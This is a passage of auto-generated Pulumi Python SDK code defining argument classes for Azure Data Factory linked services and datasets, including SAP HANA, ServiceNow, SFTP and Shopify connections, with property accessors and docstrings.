pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def server(self) -> Any:
"""
Host name of the SAP HANA server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the SAP HANA server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the SAP HANA server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username to access the SAP HANA server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SecureStringArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
"""
Azure Data Factory secure string definition. The string value will be masked with asterisks '*' during Get or List API calls.
:param pulumi.Input[str] type: Type of the secret.
:param pulumi.Input[str] value: Value of secure string.
"""
pulumi.set(__self__, "type", 'SecureString')
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Value of secure string.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]] = None):
"""
Self-hosted integration runtime.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']] linked_info: The base definition of a linked integration runtime, authorized through either a key or RBAC.
"""
pulumi.set(__self__, "type", 'SelfHosted')
if description is not None:
pulumi.set(__self__, "description", description)
if linked_info is not None:
pulumi.set(__self__, "linked_info", linked_info)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedInfo")
def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]]:
"""
The base definition of a linked integration runtime, authorized through either a key or RBAC.
"""
return pulumi.get(self, "linked_info")
@linked_info.setter
def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]]):
pulumi.set(self, "linked_info", value)
@pulumi.input_type
class ServiceNowLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_id: Optional[Any] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None,
username: Optional[Any] = None):
"""
ServiceNow server linked service.
:param pulumi.Input[str] authentication_type: The authentication type to use.
:param Any endpoint: The endpoint of the ServiceNow server. (e.g. <instance>.service-now.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any client_id: The client ID for OAuth2 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret for OAuth2 authentication.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name for Basic and OAuth2 authentication.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
:param Any username: The user name used to connect to the ServiceNow server for Basic and OAuth2 authentication.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'ServiceNow')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to use.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the ServiceNow server. (e.g. <instance>.service-now.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[Any]:
"""
The client ID for OAuth2 authentication.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[Any]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret for OAuth2 authentication.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name for Basic and OAuth2 authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the ServiceNow server for Basic and OAuth2 authentication.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ServiceNowObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
ServiceNow server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ServiceNowObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SftpServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
host_key_fingerprint: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
pass_phrase: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
private_key_content: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
private_key_path: Optional[Any] = None,
skip_host_key_validation: Optional[Any] = None,
user_name: Optional[Any] = None):
"""
A linked service for an SSH File Transfer Protocol (SFTP) server.
:param Any host: The SFTP server host name. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the SFTP server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any host_key_fingerprint: The host key fingerprint of the SFTP server. When SkipHostKeyValidation is false, HostKeyFingerprint should be specified. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] pass_phrase: The password to decrypt the SSH private key if the SSH private key is encrypted.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to log on to the SFTP server for Basic authentication.
:param Any port: The TCP port number that the SFTP server uses to listen for client connections. Default value is 22. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] private_key_content: Base64 encoded SSH private key content for SshPublicKey authentication. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. The SSH private key should be in OpenSSH format.
:param Any private_key_path: The SSH private key file path for SshPublicKey authentication. Only valid for on-premises copy. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. The SSH private key should be in OpenSSH format. Type: string (or Expression with resultType string).
:param Any skip_host_key_validation: If true, skip the SSH host key validation. Default value is false. Type: boolean (or Expression with resultType boolean).
:param Any user_name: The username used to log on to the SFTP server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Sftp')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if host_key_fingerprint is not None:
pulumi.set(__self__, "host_key_fingerprint", host_key_fingerprint)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if pass_phrase is not None:
pulumi.set(__self__, "pass_phrase", pass_phrase)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if private_key_content is not None:
pulumi.set(__self__, "private_key_content", private_key_content)
if private_key_path is not None:
pulumi.set(__self__, "private_key_path", private_key_path)
if skip_host_key_validation is not None:
pulumi.set(__self__, "skip_host_key_validation", skip_host_key_validation)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def host(self) -> Any:
"""
The SFTP server host name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the SFTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hostKeyFingerprint")
def host_key_fingerprint(self) -> Optional[Any]:
"""
The host key fingerprint of the SFTP server. When SkipHostKeyValidation is false, HostKeyFingerprint should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_key_fingerprint")
@host_key_fingerprint.setter
def host_key_fingerprint(self, value: Optional[Any]):
pulumi.set(self, "host_key_fingerprint", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="passPhrase")
def pass_phrase(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password to decrypt the SSH private key if the SSH private key is encrypted.
"""
return pulumi.get(self, "pass_phrase")
@pass_phrase.setter
def pass_phrase(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "pass_phrase", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to log on to the SFTP server for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the SFTP server uses to listen for client connections. Default value is 22. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="privateKeyContent")
def private_key_content(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Base64 encoded SSH private key content for SshPublicKey authentication. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. The SSH private key should be in OpenSSH format.
"""
return pulumi.get(self, "private_key_content")
@private_key_content.setter
def private_key_content(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "private_key_content", value)
@property
@pulumi.getter(name="privateKeyPath")
def private_key_path(self) -> Optional[Any]:
"""
The SSH private key file path for SshPublicKey authentication. Only valid for on-premises copy. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. The SSH private key should be in OpenSSH format. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "private_key_path")
@private_key_path.setter
def private_key_path(self, value: Optional[Any]):
pulumi.set(self, "private_key_path", value)
@property
@pulumi.getter(name="skipHostKeyValidation")
def skip_host_key_validation(self) -> Optional[Any]:
"""
If true, skip the SSH host key validation. Default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "skip_host_key_validation")
@skip_host_key_validation.setter
def skip_host_key_validation(self, value: Optional[Any]):
pulumi.set(self, "skip_host_key_validation", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
The username used to log on to the SFTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ShopifyLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Shopify Service linked service.
:param Any host: The endpoint of the Shopify server. (e.g. mystore.myshopify.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The API access token that can be used to access Shopify’s data. The token won't expire if it is in offline mode.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Shopify')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The endpoint of the Shopify server. (e.g. mystore.myshopify.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The API access token that can be used to access Shopify’s data. The token won't expire if it is in offline mode.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
